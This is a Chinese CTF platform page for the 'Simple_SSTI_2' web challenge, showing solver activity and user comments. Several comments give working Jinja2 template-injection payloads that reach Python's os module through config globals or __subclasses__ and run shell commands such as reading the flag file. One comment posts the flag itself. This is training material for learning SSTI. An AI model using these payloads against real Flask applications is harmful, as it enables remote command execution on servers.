Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16096
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
5032894 攻破了该题 5小时前
那天晚风和她 攻破了该题 2天前
huangyujie 攻破了该题 2天前
yamojito 攻破了该题 3天前
lin666 攻破了该题 3天前
Vergil 攻破了该题 5天前
乐乐a 攻破了该题 5天前
psych1 攻破了该题 5天前
eight8 攻破了该题 6天前
stragon 攻破了该题 6天前
liutong27 攻破了该题 6天前
tiger007 攻破了该题 7天前
Leext 攻破了该题 7天前
storysnail 攻破了该题 7天前
zengzhijing 攻破了该题 7天前
ffggfhge 攻破了该题 7天前
孙燕姿圈外男友 攻破了该题 8天前
huasir 攻破了该题 8天前
xiayanting 攻破了该题 9天前
评论
SecI302 2年前
举报
寻找可引用的类"".__class__.__mro__[1].__subclasses__()然后查找os相关能执行命令的类=>os之类的然后通过BurpSuite遍历序号[231-235,262,264-396]得到可用的类最后cat flag即可
⎝ZJJARY 2年前
举报
①{{[].__class__.__base__.__subclasses__()}}查看所有类,并找到warnings.catch_warnings类,逐个计数或者写脚本得到序号为177 ②{{[].__class__.__base__.__subclasses__()[177].__init__.__globals__['__builtins__']['__imp'+'ort__']('os
g0207l0706 2年前
举报
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
18270938076 2年前
举报
kali 进半天都没有进去啊
kangkangki 2年前
举报
flag{316fbc12e983db18c0584de9a1cbcee3}
PlusJia 2年前
举报
https://blog.csdn.net/weixin_43651049/article/details/123391624?ops_request_misc=&request_id=&biz_id=102&utm_term=Simple_SSTI_2&utm_medium=distribute.pc_search_result.none-task-blog-2~
gtg2619 2年前
举报
tplmap能出
easyCtf 2年前
举报
/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
风灵丨玉秀 2年前
举报
/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
15062206228 2年前
举报
学习flask ssti。参考https://blog.csdn.net/DonkeyMoon/article/details/109027966?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-109027966-blo